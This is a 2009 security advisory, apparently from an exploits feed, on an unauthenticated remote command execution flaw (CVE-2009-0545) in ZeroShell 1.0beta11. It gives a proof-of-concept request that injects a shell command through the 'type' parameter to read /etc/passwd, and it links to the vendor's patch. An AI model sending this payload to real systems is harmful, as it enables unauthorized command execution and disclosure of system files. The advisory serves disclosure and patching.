|
Feeds -
Exploits
|
|
Written by Luca Carettoni
|
|
Saturday, 21 February 2009 20:20 |
ZeroShell 'cgi-bin/kerbynet' Remote Command Execution Vulnerability
-\\Bugtraq ID:
33702
-\\Class:
Input Validation Error
-\\CVE:
CVE-2009-0545
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 09 2009 12:00AM
-\\Updated:
Feb 21 2009 05:17PM
-\\Credit:
Luca Carettoni
-\\Vulnerable:
Fulvio Ricciardi ZeroShell 1.0beta11
-\\Discussion
ZeroShell is prone to a vulnerability that attackers can leverage to execute arbitrary commands. This issue occurs because the software fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
ZeroShell 1.0beta11 is vulnerable; other versions may also be affected.
-\\Exploit(s)/PoC(s):
An attacker may exploit this issue via a browser.
The following example URI and request are available:
http://www.example.com/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;[CMD HERE];%22
HTTP request:
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;
/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: IP
-\\Solution
A patch is available; please see the references for more information.
Fulvio Ricciardi ZeroShell 1.0beta11
--Fulvio Ricciardi C100-Security-Fix-beta11.tar.bz2
http://www.zeroshell.net/listing/C100-Security-Fix-beta11.tar.bzhttp://www.zeroshell.net/listing/C100-Security-Fix-beta11.tar.bz2
-\\Reference(s)
--Security Fix - Unauthenticated remote code execution
http://www.zeroshell.net/eng/patch-details/#C10 (Fulvio Ricciardi)
--ZeroShell <= 1.0beta11 Remote Code Execution
http://www.ikkisoft.com/stuff/LC-2009-01.tx (Luca Carettoni)
--ZeroShell Homepage
http://www.zeroshell.net/eng (Fulvio Ricciardi)
|
